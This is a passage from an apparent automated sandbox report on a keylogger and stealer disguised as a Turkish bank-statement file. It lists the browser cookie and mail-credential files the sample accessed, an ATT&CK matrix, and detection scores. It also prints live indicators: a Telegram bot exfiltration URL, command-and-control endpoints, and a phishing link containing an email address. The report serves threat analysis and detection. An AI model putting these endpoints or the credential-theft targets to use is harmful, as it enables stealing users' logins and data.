Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4791309433.000000000043D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EfgRyiVrT.exe PID: 760, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EfgRyiVrT.exe PID: 760, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6256, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Hesap_Hareketleri_09122024_html.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
Hesap_Hareketleri_09122024_html.exe	100%	Avira	HEUR/AGEN.1306657
Hesap_Hareketleri_09122024_html.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	100%	Avira	HEUR/AGEN.1306657
C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	172.67.177.134	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2011/12/2024%20/%2014:26:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://reallyfreegeoip.org/xml/8.46.123.175	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2011/12/2024%20/%2012:38:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002E16000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D35000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D35000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/P	EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002E07000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20a	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D35000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lB	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002F15000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D35000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002DD6000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002E16000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.175$	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002CCA000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D35000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C9F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enP	EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002DD6000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2380496640.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000A.00000002.2427183768.0000000003321000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C9F000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572373
Start date and time:	2024-12-10 14:06:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Hesap_Hareketleri_09122024_html.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/15@3/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 98% Number of executed functions: 179 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.109.210.53
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Hesap_Hareketleri_09122024_html.exe, PID 6256 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Hesap_Hareketleri_09122024_html.exe

Simulations

Behavior and APIs

Time	Type	Description
08:07:28	API Interceptor	7822541x Sleep call for process: Hesap_Hareketleri_09122024_html.exe modified
08:07:31	API Interceptor	30x Sleep call for process: powershell.exe modified
08:07:33	API Interceptor	5512652x Sleep call for process: EfgRyiVrT.exe modified
14:07:32	Task Scheduler	Run new task: EfgRyiVrT path: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	KrnlSetup.exe	Get hash	malicious	XWorm	Browse
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	run.cmd	Get hash	malicious	Unknown	Browse
	https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Get hash	malicious	HTMLPhisher	Browse
	jXN37dkptv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
172.67.177.134	10122024Hesap hareketleriniz.exe	Get hash	malicious	Snake Keylogger	Browse
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	file.exe	Get hash	malicious	Snake Keylogger	Browse
	1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exe	Get hash	malicious	Snake Keylogger	Browse
	jXN37dkptv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Lenticels.exe	Get hash	malicious	Snake Keylogger	Browse
	UBS20240190101.exe	Get hash	malicious	Snake Keylogger	Browse
132.226.247.73	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	10122024Hesap hareketleriniz.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Request for Quotation New collaboration.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	Payment Details Ref#577767.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	IBAN Payment confirmation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	dekontu.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	10122024Hesap hareketleriniz.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Request for Quotation_10.12.2024.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	FATR98765678000.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	rPurchaseOrder_PO19202409.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
